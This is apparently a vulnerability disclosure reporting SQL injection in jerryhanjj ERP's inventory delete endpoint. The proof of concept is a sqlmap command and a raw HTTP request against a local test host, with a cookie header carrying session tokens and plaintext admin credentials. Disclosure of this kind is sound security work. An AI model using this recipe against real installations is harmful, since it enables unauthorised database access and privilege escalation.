topsky979/jerryhanjj_ERP_SQL_INJECTION_1.md Secret

## jerryhanjj_ERP_SQL_INJECTION_1.md

      
    Raw
  

              jerryhanjj_ERP_SQL_INJECTION_1.md
            
          
    [description]
jerryhanjj ERP was discovered to contain a SQL Injection vulnerability via the URI /index.php/basedata/inventory/delete.

[Vulnerability Type]
SQL Injection

[Vendor of Product]
ERP,https://github.com/jerryhanjj/ERP

[Affected Product Code Base]
commit<=44bd04758b7d21b44c9db0954ec636472a7c0acf

[Impact Escalation of Privileges]
true

[POC]
sqlmap commands：
sqlmap -r a.txt -p id --batch --banner --flush-session

a.txt
POST /index.php/basedata/inventory/delete?action=delete HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 4
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/index.php/settings/goods_list
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; load_type=null; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; pnull=1; load_page=1; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; BatchPaste=2; name_reverse=True; SESSIONID=c5a998ac-ac1a-4102-962c-14f81e5eaa7d.JwnPi9EhaYyZfpOkyruZnGmLVBQ; request_token=wWTYlCvGWOyw1n0ms4ax4jl6ZBogX70mIk1wC4M9vZXHnFgO; copyFileName=null; is_admin=false; layers=5; cutFileName=null; load_search=undefined; PHPSESSID=br11orm7m3b7qqksr2ie4tk2gj; BatchSelected=null; Path=/www/wwwroot/1111.com/application/config; vcodesum=8; username=admin; userpwd=admin123456; ispwd=1; met_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%222f1ec1e9a1b2a45a55a379baca839552%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A117%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_15_7%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F126.0.0.0+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1721704716%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22username%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22userpwd%22%3Bs%3A11%3A%22admin123456%22%3Bs%3A5%3A%22token%22%3Bs%3A32%3A%2225e975d1b5e94f53d507b4f5e25d1581%22%3Bs%3A5%3A%22ispwd%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22jxcsys%22%3Ba%3A4%3A%7Bs%3A3%3A%22uid%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%E9%9F%A9%E4%BF%8A%E6%9D%B0%22%3Bs%3A8%3A%22username%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22login%22%3Bs%3A3%3A%22jxc%22%3B%7D%7D0ca5755443107035b416222797ce1964
Connection: keep-alive

id=3%